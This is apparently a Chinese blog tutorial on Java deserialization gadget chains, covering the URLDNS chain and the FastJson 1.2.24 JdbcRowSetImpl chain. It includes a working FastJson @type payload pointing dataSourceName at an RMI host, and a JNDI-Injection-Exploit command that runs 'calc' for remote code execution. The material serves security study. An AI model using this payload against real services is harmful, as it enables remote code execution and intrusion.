Web开发-JavaEE应用&原生和FastJson反序列化&URLDNS链&JDBC链&Gadget手搓

SuperherRo2025-04-21 2:39

知识点:

1、安全开发-JavaEE-原生序列化-URLDNS链分析

2、安全开发-JavaEE-FastJson-JdbcRowSetImpl链分析

bash 复制代码 
利用链也叫"gadget chains",我们通常称为gadget:
1、共同条件:实现Serializable或者Externalizable接口,最好是jdk自带或者JAVA常用组件里有
2、入口类source:(重写readObject 调用常见函数 参数类型宽泛 最好jdk自带)
3、调用链gadget chain:相同方法名、相同类型
4、执行类sink:RCE SSRF 写文件等等


一、演示案例-WEB开发-JavaEE-原生反序列化&URLDNS链(JDK自带链)

利用链跟踪

bash 复制代码 
java.util.HashMap实现了Serializable接口满足条件后,通过HashMap里面的hash到key.hashCode(),key的转变URL类,再到hashCode为-1触发URLStreamHandler.hashCode
HashMap->readObject
HashMap->putVal(put)        
HashMap->hash
key.hashCode->
URL.hashCode->              
handler.hashCode->
URLStreamHandler.getHostAddress













写利用链

参考:https://mp.weixin.qq.com/s/R3c5538ZML2yCF9pYUky6g

bash 复制代码 
搞清楚入口类,需要修改的值,需要传递的值,
创建一个HashMap泛型,(后续操作URL类即int类型值)
在创建一个url连接,(将要请求的地址写入对应代码的U)
用put方法把url数据存放到里面,触发putVal(hash(key)
其中hash里面会调用key.hashCode()
最终触发点是key,所以我们就需要给key的类型设置成URL类,
通过逻辑让hashCode的值为-1后调用handler.hashCode即URLStreamHandler.hashCode,最终调用里面的getHostAddress实现





二、演示案例-WEB开发-JavaEE-FastJson反序列化&JDBC链(JDK自带链)

参考:https://mp.weixin.qq.com/s/t8sjv0Zg8_KMjuW4t-bE-w

FastJson是啊里巴巴的的开源库,用于对JSON格式的数据进行解析和打包。其实简单的来说就是处理json格式的数据的。例如将json转换成一个类。或者是将一个类转换成一段json数据。Fastjson 是一个 Java 库,提供了Java 对象与 JSON 相互转换。

bash 复制代码 
<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.24</version>
</dependency>



1、序列化方法

bash 复制代码 
JSON.toJSONString(),对象转换为JSON字符串;
JSON.toJSONBytes(),对象转换为byte数组;

2、反序列化方法

bash 复制代码 
JSON.parseObject(),返回JsonObject;
JSON.parse(),返回Object;
JSON.parseArray(), 返回JSONArray;
将JSON对象转换为java对象:JSON.toJavaObject();
将JSON对象写入write流:JSON.writeJSONString();

3、常用

bash 复制代码 
JSON.toJSONString(),JSON.parse(),JSON.parseObject()


4、引出安全-序列化固定类后,反序列化不指定类后

parse方法在调用时会调用set方法

parseObject在调用时会调用set和get方法

5、引出安全-序列化固定类后,反序列化指定类后

parseObject在调用时会调用set方法

6、安全利用链

bash 复制代码 
JDK自带链-JdbcRowSetImpl:
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
String payload = "{" +
                "\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +
                "\"dataSourceName\":\"rmi://xx.xx.xx.xx/xxxx\", " +
                "\"autoCommit\":true" +
                "}";
JSON.parse(payload);

反序列化对象:com.sun.rowset.JdbcRowSetImpl
改动的成员变量:dataSourceName autoCommit

setdataSourceName->getdataSourceName
setautoCommit->connect->DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());

RMI注入:触发RCE
DataSource var2 = (DataSource)var1.lookup("rmi://192.168.1.2:1099/jvelrl");






生成RMI恶意调用类:

bash 复制代码 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc"



相关推荐
极小狐1 小时前
如何使用极狐GitLab 软件包仓库功能托管 maven?
java·运维·数据库·安全·c#·gitlab·maven
.生产的驴1 小时前
SpringBoot 集成滑块验证码AJ-Captcha行为验证码 Redis分布式 接口限流 防爬虫
java·spring boot·redis·分布式·后端·爬虫·tomcat
野犬寒鸦3 小时前
MySQL索引使用规则详解:从设计到优化的完整指南
java·数据库·后端·sql·mysql
思考的橙子3 小时前
Springboot之会话技术
java·spring boot·后端
钰爱&3 小时前
【Linux】POSIX 线程信号量与互斥锁▲
java·开发语言·jvm
黑匣子~5 小时前
java集成telegram机器人
java·python·机器人·telegram
竹小春逢十八6 小时前
Java常用类概述
java
weixin_437398216 小时前
RabbitMQ深入学习
java·分布式·后端·spring·spring cloud·微服务·rabbitmq
Your易元6 小时前
设计模式-迭代器模式
java·开发语言
╭⌒心岛初晴6 小时前
JAVA练习题(2) 找素数
java·开发语言·算法·java练习题·判断素数/质数
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05苍穹外卖面试总结06西电B测-计算机网络综合实验(含验收问题)07MKS SERVO42E&57E 闭环步进电机_系列9 arduino 例程08yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记09DeepSeek各版本说明与优缺点分析10最新 Kubernetes 集群部署 + flannel 网络插件(保姆级教程,最新 K8S 版本)